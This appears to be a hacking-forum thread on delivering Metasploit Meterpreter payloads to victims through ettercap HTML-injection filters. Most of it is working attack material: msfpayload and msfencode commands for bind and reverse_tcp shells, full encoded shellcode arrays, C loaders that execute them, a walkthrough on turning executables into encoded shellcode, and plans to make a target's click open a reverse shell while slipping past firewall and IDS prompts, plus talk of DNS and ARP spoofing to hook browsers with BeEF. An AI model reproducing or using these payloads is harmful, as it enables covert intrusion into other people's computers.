ettercap filter html injection meterpeter.exe

i found this http://www.okc2600.com/viewtopic.php?p=4062

./msfpayload windows/shell_bind_tcp LPORT=30000 R | ./msfencode -e x86/shikata_ga_nai c > ~/binder.c

Code:

unsigned char buf[] = "\xba\x40\x5f\x2d\x18\xd9\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1" "\x46\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\xb5\xa3\xc5\x4e" "\x35\x5c\x16\x3c\x60\x0a\x41\x49\xe6\x96\x75\xc6\xb3\xea\x0e" "\x8c\x3e\x6b\x10\xc7\xcb\xc1\x0a\x9c\x91\xf5\x2b\x49\xc6\xc4" "\x62\x06\x3c\xa2\x74\xf6\x0d\x4b\x8a\x37\xad\x1f\x4b\xd8\x59" "\x67\x6d\xd7\xac\x66\xaa\x03\x5c\x53\x48\xf0\xb4\xd1\x51\x73" "\xee\x3d\x93\x6f\x68\xb5\x9f\x24\xff\x93\x83\xbb\x14\xa8\xb8" "\x30\xeb\x47\x2b\x44\xda\x57\xf3\x17\x41\x03\xce\xa0\x79\xed" "\xa4\x80\x20\x75\xb2\xf8\x59\x2e\xc8\x71\x06\xcd\x5b\x9e\x33" "\xb6\x53\xf2\x2b\xc7\x2a\xfa\x47\x28\x64\x8b\x50\x84\xe1\xd8" "\x94\x84\x63\x1f\xfe\x5a\x6f\xe0\xff\x5c\x70\xb1\xa8\x0a\x23" "\xb8\xb3\x5b\xdc\xba\x3b\x9c\x73\xbb\x3b\x9c\xc5\xa5\x23\x7b" "\x8d\xcf\x23\x6a\x22\x16\x69\x0c\x62\xe0\x98\x60\x5f\x1e\x9e" "\x40\x37\xb2\x6c\xe8\x84\x06\x90\x4d\x66\x2d\x88\x20\x87\x65" "\x21\x1d\xfe\x49\xbc\xd7\x15\x24\xbb\x4e\x47\xeb\x3c\x44\xe8" "\xf4\x97\xa1\xaf\x83\x13\x24\xad\x66\x30\x1f\x66\x78\x71\xa0" "\xd3\xae\x4c\x9e\x8c\xfe\xfe\x4e\x6d\xaf\xbe\x3e\x92\x1a\x1a" "\x36\xab\xcd\xa2\xe0\x35\x08\x4a\xf3\x35\x14\xee\x7a\xd4\x7e" "\xfe\x2d\x40\x80\xab\xed\x04\x3e\x0d\xb8\x19\x58\xb7\x12\x5b" "\x43\xbf\xcc\x31\x8c\x40\xa5\xc9\x05\x7d\x2c\xd2\x43\xd2\xe6" "\x2d\x3e\xcc\xf7\x01\xcb";

i took the code above and come up with this

Code:

#include <stdio.h> /* 8192 */ char payload[] = "\xba\x40\x5f\x2d\x18\xd9\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1" "\x46\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\xb5\xa3\xc5\x4e" "\x35\x5c\x16\x3c\x60\x0a\x41\x49\xe6\x96\x75\xc6\xb3\xea\x0e" "\x8c\x3e\x6b\x10\xc7\xcb\xc1\x0a\x9c\x91\xf5\x2b\x49\xc6\xc4" "\x62\x06\x3c\xa2\x74\xf6\x0d\x4b\x8a\x37\xad\x1f\x4b\xd8\x59" "\x67\x6d\xd7\xac\x66\xaa\x03\x5c\x53\x48\xf0\xb4\xd1\x51\x73" "\xee\x3d\x93\x6f\x68\xb5\x9f\x24\xff\x93\x83\xbb\x14\xa8\xb8" "\x30\xeb\x47\x2b\x44\xda\x57\xf3\x17\x41\x03\xce\xa0\x79\xed" "\xa4\x80\x20\x75\xb2\xf8\x59\x2e\xc8\x71\x06\xcd\x5b\x9e\x33" "\xb6\x53\xf2\x2b\xc7\x2a\xfa\x47\x28\x64\x8b\x50\x84\xe1\xd8" "\x94\x84\x63\x1f\xfe\x5a\x6f\xe0\xff\x5c\x70\xb1\xa8\x0a\x23" "\xb8\xb3\x5b\xdc\xba\x3b\x9c\x73\xbb\x3b\x9c\xc5\xa5\x23\x7b" "\x8d\xcf\x23\x6a\x22\x16\x69\x0c\x62\xe0\x98\x60\x5f\x1e\x9e" "\x40\x37\xb2\x6c\xe8\x84\x06\x90\x4d\x66\x2d\x88\x20\x87\x65" "\x21\x1d\xfe\x49\xbc\xd7\x15\x24\xbb\x4e\x47\xeb\x3c\x44\xe8" "\xf4\x97\xa1\xaf\x83\x13\x24\xad\x66\x30\x1f\x66\x78\x71\xa0" "\xd3\xae\x4c\x9e\x8c\xfe\xfe\x4e\x6d\xaf\xbe\x3e\x92\x1a\x1a" "\x36\xab\xcd\xa2\xe0\x35\x08\x4a\xf3\x35\x14\xee\x7a\xd4\x7e" "\xfe\x2d\x40\x80\xab\xed\x04\x3e\x0d\xb8\x19\x58\xb7\x12\x5b" "\x43\xbf\xcc\x31\x8c\x40\xa5\xc9\x05\x7d\x2c\xd2\x43\xd2\xe6" "\x2d\x3e\xcc\xf7\x01\xcb"; /* 512 */ char comment[] = " "; int main(int argc, char **argv) { (*(void (*)()) payload)(); return(0); }

i tryed to compile this with gcc meterpreter.c -o meterpreter.exe
But im sure its clear that i dont know what im doing with this source lol

I GOT IT WOOT :D

http://markremark.blogspot.com/2008/...e-and-exe.html
and it looks like you can dubble encode it or something like that

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6,LPORT=100 R | ./msfencode -t exe > meta.exe

Awsome, i was thinking that the payload may be getting some bad chars when it gets run trough twice, but i see he has fixed this, or so it seems. I am about to go home for an early Thanksgiving but ill take my laptop and work with the meterpreter/http ...all others set off the firewall IDS on Vista. But again, since the port is used it doesnt work. The XP os i have just runs it, firewall never asks for permission. I'll see what i come up with. Im going to take one of the auto_pwn servers as a base and use that as the connection point, so that port 80 is free to connect back for shell. This way when the target clicks "RUN" it will do just that, instead of IDS saying "do you want to open the firewall for this app.?", i will let you know.
Again, awsome find.

--EDIT--
btw, my initial thought is that the double encode is putting a \x00 or another null byte of some kind either during the encode, or the target cpu is goofing the shellcode somewhere. My laptop is packed up for the trip at the moment but if i remember correctly, the initial single encode came back with (+-)300 chars of payload, ... and the original double encode gave (+)700-800 chars, a lot of room for a null byte, or misinterpretation by the target machine.

--EDIT EDIT--
also gcc cant do that, as far as its concerned you have a misc. piece of info with no instructions on what to do with it. You would need to finish the code. The piece your looking at now is declaring that unsigned buff[] = "shellcode" but you would need to finish it with an

init main()
run unsighned buff[]

bad example of sudo code i know. :(
but it would be the same as if i told you that "the book you want is at the Library!"
...but if i don't give you instructions to the building, that doesn't do you any good.

I hope this answers your question.

Hey bigmac
alright im going to try to do something of a tutorial on getting 'code' from the windows-binaries folder.
First thing im going to do is go into whats going on with msfpayload, how to use the output... and then well get into all that.

My initial thought was that it could be done, however ...to mush together the hex with user input would require more c than im willing to go into on this particular tutorial. that said, here we go...
alright the first thing is programing, if you want to take this further i would suggest learning a little bit of C and assembly. Im going to refer back to your post where u used an msfpayload option for a tcp shell and it gave you the output:

Quote:

unsigned char buf[] =
"\xba\x40\x5f\x2d\x18\xd9\xd0\xd9\x74\x24\xf4\x5e\ x2b\xc9\xb1"
"\x46\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\xb5\ xa3\xc5\x4e"
"\x35\x5c\x16\x3c\x60\x0a\x41\x49\xe6\x96\x75\xc6\ xb3\xea\x0e"
"\x8c\x3e\x6b\x10\xc7\xcb\xc1\x0a\x9c\x91\xf5\x2b\ x49\xc6\xc4"
"\x62\x06\x3c\xa2\x74\xf6\x0d\x4b\x8a\x37\xad\x1f\ x4b\xd8\x59"
"\x67\x6d\xd7\xac\x66\xaa\x03\x5c\x53\x48\xf0\xb4\ xd1\x51\x73"
"\xee\x3d\x93\x6f\x68\xb5\x9f\x24\xff\x93\x83\xbb\ x14\xa8\xb8"
"\x30\xeb\x47\x2b\x44\xda\x57\xf3\x17\x41\x03\xce\ xa0\x79\xed"
"\xa4\x80\x20\x75\xb2\xf8\x59\x2e\xc8\x71\x06\xcd\ x5b\x9e\x33"
"\xb6\x53\xf2\x2b\xc7\x2a\xfa\x47\x28\x64\x8b\x50\ x84\xe1\xd8"
"\x94\x84\x63\x1f\xfe\x5a\x6f\xe0\xff\x5c\x70\xb1\ xa8\x0a\x23"
"\xb8\xb3\x5b\xdc\xba\x3b\x9c\x73\xbb\x3b\x9c\xc5\ xa5\x23\x7b"
"\x8d\xcf\x23\x6a\x22\x16\x69\x0c\x62\xe0\x98\x60\ x5f\x1e\x9e"
"\x40\x37\xb2\x6c\xe8\x84\x06\x90\x4d\x66\x2d\x88\ x20\x87\x65"
"\x21\x1d\xfe\x49\xbc\xd7\x15\x24\xbb\x4e\x47\xeb\ x3c\x44\xe8"
"\xf4\x97\xa1\xaf\x83\x13\x24\xad\x66\x30\x1f\x66\ x78\x71\xa0"
"\xd3\xae\x4c\x9e\x8c\xfe\xfe\x4e\x6d\xaf\xbe\x3e\ x92\x1a\x1a"
"\x36\xab\xcd\xa2\xe0\x35\x08\x4a\xf3\x35\x14\xee\ x7a\xd4\x7e"
"\xfe\x2d\x40\x80\xab\xed\x04\x3e\x0d\xb8\x19\x58\ xb7\x12\x5b"
"\x43\xbf\xcc\x31\x8c\x40\xa5\xc9\x05\x7d\x2c\xd2\ x43\xd2\xe6"
"\x2d\x3e\xcc\xf7\x01\xcb";

Alright, thats nice looking but we have to do something with it. Or at least tell the computer too.

lets start with some smaller/simpler code.
so im gonna open a shell, cd over to framework3, and use ...

Quote:

# ./msfpayload linux/x86/exec CMD="ls -la" C

should return ...

Quote:

/*
* linux/x86/exec - 42 bytes
* it wont let me put the link
* AppendExit=false, CMD=ls -la, PrependSetresuid=false,
* PrependSetuid=false, PrependSetreuid=false
*/
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\ x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\ x00\x00\x6c"
"\x73\x20\x2d\x6c\x61\x00\x57\x53\x89\xe1\xcd\x80" ;

alright lets do something with this...
make a text file and name it "first.c"

insert this into it.

Quote:

char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\ x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\ x00\x00\x6c"
"\x73\x20\x2d\x6c\x61\x00\x57\x53\x89\xe1\xcd\x80" ;

int main(int argc, char **argv) {
int(*func)();
func = (int (*)()) shellcode;
(int)(*func)();
}

Alright now compile it with...

Quote:

# gcc -o first first.c

then run

Quote:

# ./first

(or u could just use "first" ....its executable)

should give you a list equal to ls -la.

Alright that should give you a good indication of what to do with the code given by msfpayload.
You should be able to make your own mini C programs with the given example. (and for others, yes there are other ways to do it, such as def a pointer to it, but again, off the top o my head, thats what u get)

Now then, for the main part and to answer your question... you didn't really specify which program you wanted to do this with... encoding the ALREADY compiled data, in my mind, can be done. However, i see a problem. If the program accepts user input... there really isn't any way for it to collect said data (actually i would think that given an argv[1] or similar when ran in the C code should do it... but im not getting into that right now)
anyway...here we go.
And keep in mind im doing a trial run of everything as i type this.

Well i think im going to use an example for this that is short and to the point.
I think you will understand why at the end of this tut.

part 2

Alright lets get into something with some MEAT to it already.
Go back to your msfpayload and type this...
**NOTE: the double lines in the Dir Address... it will not read otherwise ...and i forget why off the top of my head at the moment....bash something or other(dont hate me cuz i have alzheimer's)

Quote:

# ./msfpayload windows/exec EXITFUNC=seh CMD=C:\\WINDOWS\\System32\\calc.exe C

this should give you this.

Quote:

/*
* windows/exec - 141 bytes
* again no links
* EXITFUNC=seh, CMD=C:\WINDOWS\System32\calc.exe
*/
unsigned char buf[] =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\ x78\x01\xef"
"\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\ x01\xee\x31"
"\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\ xeb\xf4\x3b"
"\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\ x0c\x4b\x8b"
"\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\ x04\xc3\x5f"
"\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b\x40\x0c\x8b\ x70\x1c\xad"
"\x8b\x68\x08\x89\xf8\x83\xc0\x6a\x50\x68\xf0\x8a\ x04\x5f\x68"
"\x98\xfe\x8a\x0e\x57\xff\xe7\x43\x3a\x5c\x57\x49\ x4e\x44\x4f"
"\x57\x53\x5c\x53\x79\x73\x74\x65\x6d\x33\x32\x5c\ x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

Alright, now theres your shellcode to start calc.exe for a windows computer.
* You may want to put it into the C program above and run it to check, ..i have already done this, and it works. But just in case, Feel free.

Once again with msfpayload, im going to make this an executable and name it myfile.exe and im going to funnel it all into the root window.

Quote:

# ./msfpayload windows/exec EXITFUNC=seh CMD=C:\\WINDOWS\\System32\\calc.exe X > /root/myfile.exe

Ok so now we have an EXE file in our home/root directory.
now type...

Quote:

# cd
# ls

you should see your file (myfile.exe), or just a visial check will do, i put it there for ease of usage and movement.
* im moving these files with a usbdrive from computer to computer (**checking them on Vista and Xp-sp3)

At this time if you would like to, again, move it over to windows and try it.
It should work and start the calculator program.

Back at the shell type this:

Quote:

# objdump -d myfile.exe

Your output should look something like this ....

Quote:

################################################## #####
myfile.exe: file format efi-app-ia32

Disassembly of section .text:

0000000000401000 <.text>:
401000: 31 c0 xor %eax,%eax
401002: 68 34 10 40 00 push $0x401034
401007: 64 ff 30 pushl %fs:(%eax)
40100a: 64 89 20 mov %esp,%fs:(%eax)
40100d: 6a 40 push $0x40
40100f: 68 00 30 00 00 push $0x3000
401014: 68 00 00 10 00 push $0x100000
401019: 6a 00 push $0x0
40101b: e8 24 00 00 00 call 0x401044
401020: 89 c5 mov %eax,%ebp
401022: 89 c7 mov %eax,%edi
401024: be 00 20 40 00 mov $0x402000,%esi
401029: b9 00 08 00 00 mov $0x800,%ecx
40102e: f3 a5 rep movsl %ds:(%esi),%es:(%edi)
401030: ff d5 call *%ebp
401032: 90 nop
401033: 90 nop
401034: ff 25 3c 40 40 00 jmp *0x40403c
40103a: 90 nop
40103b: 90 nop
...
401044: ff 25 40 40 40 00 jmp *0x404040
40104a: 90 nop
40104b: 90 nop
...
401054: ff (bad)
401055: ff (bad)
401056: ff (bad)
401057: ff 00 incl (%eax)
401059: 00 00 add %al,(%eax)
40105b: 00 ff add %bh,%bh
40105d: ff (bad)
40105e: ff (bad)
40105f: ff 00 incl (%eax)
401061: 00 00 add %al,(%eax)
...
################################################## ########

lets take a look at this from the top.
Going left to right
We have file format and type
The section it is disassembling
and the start of memory number and again <section> of disassembly
(lemme bring it down)

Quote:

################################################## #########
myfile.exe: file format efi-app-ia32

Disassembly of section .text:

0000000000401000 <.text>:
401000: 31 c0 xor %eax,%eax
401002: 68 34 10 40 00 push $0x401034
401007: 64 ff 30 pushl %fs:(%eax)
40100a: 64 89 20 mov %esp,%fs:(%eax)
################################################## ##########
1 2 3

ok at point 1 we have memory addresses
point 2 we have hex
and point 3 is the assembly

Take a look at point 2

Quote:

31 0c
68 34 10 40 00

does this look familiar??
What if i wrote it like this ..

Quote:

\x31\x0c
\x68\x34\x10\x40\x00

BINGO, if you'll take all the hex code and revamp it into \x** format, you now have your shellcode for the program.

part 3

So im going to do just that...

Quote:

char shellcode[] =
"\x31\xc0\x68\x34\x10\x40\x00\x64\xff\x30\x64\x89\ x20\x6a\x40\x68\x00\x30\x00"
"\x00\x68\x00\x00\x10\x00\x6a\x00\xe8\x24\x00\x00\ x00\x89\xc5\x89\xc7\xbe\x00"
"\x20\x40\x00\xb9\x00\x08\x00\x00\xf3\xa5\xff\xd5\ x90\x90\xff\x25\x3c\x40\x40"
"\x00\x90\x90\xff\x25\x40\x40\x40\x00\x90\x90\xff\ xff\xff\xff\x00\x00\x00\x00"
"\xff\xff\xff\xff\x00\x00\x00";

int main(int argc, char **argv) {
int(*func)();
func = (int (*)()) shellcode;
(int)(*func)();

Now compile that again as

Quote:

# gcc -o myfile myfile.c

Take that and run it on a windows box ....opens calc.exe
Alright, now for the encoding.
take just the shellcode aka,
"\x31\xc0\x68\x34\x10\x40\x00\x64\xff\x30\x64\x89\ x20\x6a\x40\x68\x00\x30\x00"
"\x00\x68\x00\x00\x10\x00\x6a\x00\xe8\x24\x00\x00\ x00\x89\xc5\x89\xc7\xbe\x00"
"\x20\x40\x00\xb9\x00\x08\x00\x00\xf3\xa5\xff\xd5\ x90\x90\xff\x25\x3c\x40\x40"
"\x00\x90\x90\xff\x25\x40\x40\x40\x00\x90\x90\xff\ xff\xff\xff\x00\x00\x00\x00"
"\xff\xff\xff\xff\x00\x00\x00";
and copy that into a text file and run it through the encoder.

Quote:

# ./msfencode -i shell.txt -t c

This should ouput something like ...

Quote:

[*] x86/shikata_ga_nai succeeded, final size 374

unsigned char buf[] =
"\xdb\xd3\xd9\x74\x24\xf4\x29\xc9\xbb\x3e\x80\xd0\ xc5\x5a\xb1"
"\x57\x31\x5a\x1a\x03\x5a\x1a\x83\xea\xfc\xe2\xcb\ xa2\x8c\xbd"
"\x00\x92\x70\x46\x05\xe4\xd4\xce\xff\x3c\xb9\x56\ xcc\x08\x1d"
"\xdf\x03\x41\xc1\x67\x57\x91\xa5\xef\xa7\xe1\x09\ x68\xf1\x35"
"\xee\xf0\x9b\x53\x52\x79\x50\xac\x36\x01\xa0\xf8\ x9a\x89\xf4"
"\x39\x7f\x12\x36\x0a\x23\x9a\x00\x0b\x87\x22\x58\ xfb\x6b\xab"
"\x96\xc3\xcf\x33\xe6\x03\xac\xbb\x35\x54\x10\x44\ x09\xa4\x8a"
"\xbe\x4b\x98\xb2\x8e\xbb\x7c\x3b\xd9\x83\x20\xc3\ x15\xc3\x84"
"\x4b\x66\x13\x69\xd4\xb7\x63\xcd\x5c\x88\xb3\xb1\ xe4\xde\xd2"
"\x15\x6d\x2f\x24\xfa\xf5\x2a\x7c\x5e\x7e\x87\x48\ x02\x06\xd7"
"\x80\xe6\x8e\x27\xd0\x4a\x17\x78\x20\x2f\x9f\x40\ x79\x93\x27"
"\xd2\x4c\x77\xa0\x2c\x97\xdb\x28\x2e\xd0\xbf\xb0\ xd2\x7b\x1c"
"\x39\x23\xb3\xbe\xb3\x61\xef\xc6\xf1\x55\x53\x4f\ xc2\xa5\x37"
"\xd7\x1a\xf6\x9b\x5f\x39\xcf\x7f\xd8\x8d\x1f\x23\ x60\xde\x67"
"\x87\xe8\x2e\xa8\x6b\x71\x7f\xf8\xcf\xf9\x19\xcb\ xb3\x81\x84"
"\x1e\x17\x0a\x21\x07\xfb\x92\xc9\xf2\x5f\x1b\x2b\ xcd\x03\xa3"
"\x72\x1d\xe7\x2b\xe3\x3b\x4b\xb4\xd9\xf6\x2f\x3c\ x2d\x9a\x93"
"\xc4\x65\x6c\x77\x4d\xb2\xbc\xa5\xa7\x98\xe0\xd1\ x87\xec\x44"
"\x59\xd1\x3c\x29\xe1\x18\x0d\x8d\x69\x3d\x0b\x71\ xf1\xf3\xe6"
"\xd5\x79\xc0\x38\xba\x01\x1c\x09\x1e\x89\x68\x59\ xc2\x11\xa1"
"\xa9\xa6\x99\xf8\xf9\x0a\x21\xc2\xc9\xee\xa9\x52\ x4c\x53\x31"
"\xfd\xf6\x37\xb9\x67\x91\x9b\x41\x0e\x3b\x78\xc9\ xfe\xf3\xdc"
"\x51\xcf\xc3\x80\xd9\x1f\x14\x65\x61\x50\x64\xb7\ x9b\xb2\xd8"
"\xcf\xfd\xd4\xbc\x57\x67\x7f\x61\xd0\x01\x19\xc5\ x58\xab\x83"
"\xa9\xe0\x03\x7c\x0e\x69\x53\x4c\xf2\xf1\xa3\x9c\ x28\x39";

Alright lets give it a whurl with the c program.

Quote:

char shellcode[] =
"\xdb\xd3\xd9\x74\x24\xf4\x29\xc9\xbb\x3e\x80\xd0\ xc5\x5a\xb1"
"\x57\x31\x5a\x1a\x03\x5a\x1a\x83\xea\xfc\xe2\xcb\ xa2\x8c\xbd"
"\x00\x92\x70\x46\x05\xe4\xd4\xce\xff\x3c\xb9\x56\ xcc\x08\x1d"
"\xdf\x03\x41\xc1\x67\x57\x91\xa5\xef\xa7\xe1\x09\ x68\xf1\x35"
"\xee\xf0\x9b\x53\x52\x79\x50\xac\x36\x01\xa0\xf8\ x9a\x89\xf4"
"\x39\x7f\x12\x36\x0a\x23\x9a\x00\x0b\x87\x22\x58\ xfb\x6b\xab"
"\x96\xc3\xcf\x33\xe6\x03\xac\xbb\x35\x54\x10\x44\ x09\xa4\x8a"
"\xbe\x4b\x98\xb2\x8e\xbb\x7c\x3b\xd9\x83\x20\xc3\ x15\xc3\x84"
"\x4b\x66\x13\x69\xd4\xb7\x63\xcd\x5c\x88\xb3\xb1\ xe4\xde\xd2"
"\x15\x6d\x2f\x24\xfa\xf5\x2a\x7c\x5e\x7e\x87\x48\ x02\x06\xd7"
"\x80\xe6\x8e\x27\xd0\x4a\x17\x78\x20\x2f\x9f\x40\ x79\x93\x27"
"\xd2\x4c\x77\xa0\x2c\x97\xdb\x28\x2e\xd0\xbf\xb0\ xd2\x7b\x1c"
"\x39\x23\xb3\xbe\xb3\x61\xef\xc6\xf1\x55\x53\x4f\ xc2\xa5\x37"
"\xd7\x1a\xf6\x9b\x5f\x39\xcf\x7f\xd8\x8d\x1f\x23\ x60\xde\x67"
"\x87\xe8\x2e\xa8\x6b\x71\x7f\xf8\xcf\xf9\x19\xcb\ xb3\x81\x84"
"\x1e\x17\x0a\x21\x07\xfb\x92\xc9\xf2\x5f\x1b\x2b\ xcd\x03\xa3"
"\x72\x1d\xe7\x2b\xe3\x3b\x4b\xb4\xd9\xf6\x2f\x3c\ x2d\x9a\x93"
"\xc4\x65\x6c\x77\x4d\xb2\xbc\xa5\xa7\x98\xe0\xd1\ x87\xec\x44"
"\x59\xd1\x3c\x29\xe1\x18\x0d\x8d\x69\x3d\x0b\x71\ xf1\xf3\xe6"
"\xd5\x79\xc0\x38\xba\x01\x1c\x09\x1e\x89\x68\x59\ xc2\x11\xa1"
"\xa9\xa6\x99\xf8\xf9\x0a\x21\xc2\xc9\xee\xa9\x52\ x4c\x53\x31"
"\xfd\xf6\x37\xb9\x67\x91\x9b\x41\x0e\x3b\x78\xc9\ xfe\xf3\xdc"
"\x51\xcf\xc3\x80\xd9\x1f\x14\x65\x61\x50\x64\xb7\ x9b\xb2\xd8"
"\xcf\xfd\xd4\xbc\x57\x67\x7f\x61\xd0\x01\x19\xc5\ x58\xab\x83"
"\xa9\xe0\x03\x7c\x0e\x69\x53\x4c\xf2\xf1\xa3\x9c\ x28\x39";

int main(int argc, char **argv) {
int(*func)();
func = (int (*)()) shellcode;
(int)(*func)();
}

It should run the calc.exe yet again.
I hope that is the information you were looking for. What exactly in the folder were you hoping to encode or use? Lemme know and ill work on it.

Would there be a way to write executable instructions like this directly in the html filter, instead of in the created/downloaded meterpreter file? It would be good if we had a simple redirect with an automatic reverse_tcp on the redirect connect, instead of having the client download, get warned numerous times, and then install...

Hi McCurran,
I would never be one to say that anything is impossible, but I think the easiest way to do this may be with beEF, or the browser exploitation framework. I have noticed that ettercap does not work to well with IE8, allthough i have not kept up with newer versions, posts, workarounds, etc... beef may be more effective if you simply rely on DNS redirection from ettercap to the beef server.
Just a thought...

You would still need to use ettercap or other dns and arp spoofing applications in order to redirect and create zombies in beef, wouldn't you?